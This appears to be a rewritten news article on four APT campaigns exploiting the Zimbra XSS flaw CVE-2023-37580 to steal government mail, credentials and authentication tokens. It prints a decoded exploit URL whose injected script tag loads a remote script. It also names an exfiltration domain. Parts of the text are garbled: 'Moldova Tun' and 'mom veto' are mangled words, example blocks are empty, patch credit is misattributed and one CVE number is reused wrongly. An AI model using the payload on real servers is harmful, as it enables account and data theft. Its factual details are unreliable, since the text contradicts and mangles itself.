APTs Swarm Zimbra Zero-Day to Steal Government Info Worldwide

In the Zimbra Collaboration Suite, at least four campaigns attempted to siphon sensitive mail data through CVE-2023-37580.

A piece of news came rolling out that four different cyberattack groups, with the help of a former zero-day security vulnerability in the Zimbra Collaboration Suite (ZCS), have had an attempt to steal email data, user’s personal information, and authentication tokens from government organizations globally. According to Zimbra’s website, ZCS has “thousands” of users, including companies and individuals. It is an email server, calendar, chat, and video platform. The attack has been carried out on world governments, including Greece, Moldova Tun, India, Vietnam, and Pakistan.

As of July 25, Zimbra’s public GitHub repository was updated with a hotfix to patch a cross-site scripting (XSS) vulnerability (CVE-2023-37580). Dark Reading was informed that the zero-day exploitation began in June, before Zimbra offered remediation, according to a report published by Google’s Threat Analysis Group (TAG).

0-day discovery, hotfix, and patch

As a reflected cross-site scripting (XSS) vulnerability, TAG discovered the 0-day vulnerability in June when targeted attacks were conducted against Zimbra’s email server. They patched the vulnerability as CVE-2023-37580 on July 25, 2023. On July 5, 2023, Zimbra released a hotfix to their public GitHub. An initial advisory with remediation guidance was published on July 13, 2023.

Before the official patch was released, TAG observed three threat groups exploiting the vulnerability, including groups that learned about it after the fix was initially posted on GitHub. Following the release of the official patch, TAG discovered a fourth campaign exploiting the XSS vulnerability. Several of these campaigns started after the hotfix was first made public, showing the importance of applying fixes as soon as possible.

The Vulnerability CVE-2023-37580

In reflected cross-site scripting (XSS), malicious scripts can be injected into another website through a web application vulnerability known as CVE-2023-37580. In this case, a vulnerability in Zimbra injected the parameter within the URL directly into the webpage, resulting in the script being executed. Here are some examples of where the XSS would be triggered:


Which decodes to:

https://mail.REDACTED[.]com/m/mom veto?st=acg”/><script src=”https://REDACTED/script.js“></script>//

To fix the problem, the contents of the st parameter must be escaped before they are set as values in HTML objects.

Campaign 1: First known exploitation leads to an email-stealing framework

An attack targeting a government organization in Greece led to the discovery of the zero-day vulnerability in the wild. When a target clicked the link while logged into Zimbra, the link loaded the same framework Volexity, which was documented in February 2022 and included exploit URLs. With the help of XSS, this framework can steal users’ mail data, including emails and attachments, and set up an auto-forwarding rule that sends messages to an attacker’s email address. Here is where the framework was loaded:


Campaign 2: Winter Vivern exploitation after hotfix pushed to GitHub

A patch for the vulnerability was released on Github on July 5. A second actor exploited the exposure for two weeks, from July 11 until the official patch was made available on July 25. Multiple exploit URLs were identified by TAG-targeted government organizations in Moldova and Tunisia; each URL contained an official email address for a particular organization within these governments. The vulnerability was exploited by Winter Vivern (UNC4907), an APT group known for using XSS in Zimbra and Roundcube.



Campaign 3: Exploit used for credential phishing

A third, unidentified group exploited this vulnerability a day before Zimbra released its official patch on July 25 in a campaign phishing for credentials belonging to Vietnamese government agencies. In this case, the exploit URL pointed to a script that displayed a phishing page for users’ webmail credentials and posted stolen credentials to a URL hosted on an official government domain that the attackers likely compromised.

Campaign 4: N-day exploit used for stealing authentication token

It was discovered in August 2023 that a fourth campaign was exploiting the Zimbra authentication token and sending it to ntcpk[.]org after TAG patched CVE-2023-37580.


At least four campaigns exploiting CVE-2023-37580 have been discovered three months after the bug was publicly disclosed. This emphasizes the importance of organizations applying fixes to their mail servers as soon as possible. In addition, these campaigns demonstrate how attackers monitor open-source repositories to exploit vulnerabilities that have yet to be released to users when they are in the repository. Despite pushing the fix to Github, Campaign #2 began using the bug before Zimbra publicly advised how to fix it.

This vulnerability follows CVE-2022-24682, another reflected XSS vulnerability in Zimbra mail servers that was actively exploited in 2022. In the past month, CVE-2023-37580 has been exploited, as has CVE-2022-24682, a reflected XSS vulnerability in Roundcube mail servers. Mail servers are regularly exploited for XSS vulnerabilities, demonstrating the need to further audit these applications, especially for XSS vulnerabilities.

TAG shares its research to raise awareness and promote security across the ecosystem in light of the Zimbra response and patch. We want to thank Zimbra for their response. In addition, all identified websites and domains are added to Safe Browsing to protect users. We encourage organizations and users to stay up-to-date on all software and apply patches rapidly. As part of its ongoing mission, TAG will continue to monitor, analyze, prevent, and report 0-day vulnerabilities to vendors as soon as they are found.

Leave a Reply